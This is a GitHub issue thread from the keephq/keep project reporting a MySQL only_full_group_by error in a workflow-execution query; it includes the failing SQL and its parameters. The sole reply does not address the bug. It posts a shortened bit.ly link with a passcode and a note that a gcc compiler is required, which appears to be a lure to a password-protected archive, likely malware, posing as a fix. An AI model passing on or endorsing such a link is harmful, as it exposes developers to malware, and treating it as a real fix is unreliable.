### ISSUE TITLE
FIx breaking expection in the workflow execution endpoint

### ISSUE THREAD

**Issue by rajeshj11** [keephq/keep#1843]
**Describe the bug**
An unhandled exception occurred: (pymysql.err.OperationalError) (1055, "Expression #1 of ORDER BY clause is not in GROUP BY clause and contains nonaggregated column 'keepdb.workflowexecution.started' which is not functionally dependent on columns in GROUP BY clause; this is incompatible with sql_mode=only_full_group_by")
[SQL: SELECT workflowexecution.status AS workflowexecution_status, count(*) AS count 
FROM workflowexecution 
WHERE workflowexecution.tenant_id = %(tenant_id_1)s AND workflowexecution.workflow_id = %(workflow_id_1)s AND workflowexecution.started >= %(started_1)s GROUP BY workflowexecution.status ORDER BY workflowexecution.started DESC /*db_driver='pymysql',db_framework='sqlalchemy%%3A0.41b0',traceparent='00-e7e57fc951f20ce6b1e90605d191df5e-9531936e4ea274c5-01'*/]
[parameters: {'tenant_id_1': 'cfe1e6cb-124b-4684-b697-32e8c54a9a77', 'workflow_id_1': '1855f0f7-14d4-4d67-ae30-c150aa363bb5', 'started_1': datetime.datetime(2024, 8, 6, 13, 4, 30, 866960, tzinfo=datetime.timezone.utc)}]
(Background on this error at: https://sqlalche.me/e/14/e3q8), Trace ID: e7e57fc951f20ce6b1e90605d191df5e. Tenant ID: cfe1e6cb-124b-4684-b697-32e8c54a9a77

**To Reproduce**

**Expected behavior**

**Screenshots**

**Desktop (please complete the following information):**

**Smartphone (please complete the following information):**

**Additional context**

**Comment by OldSnailCPP** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
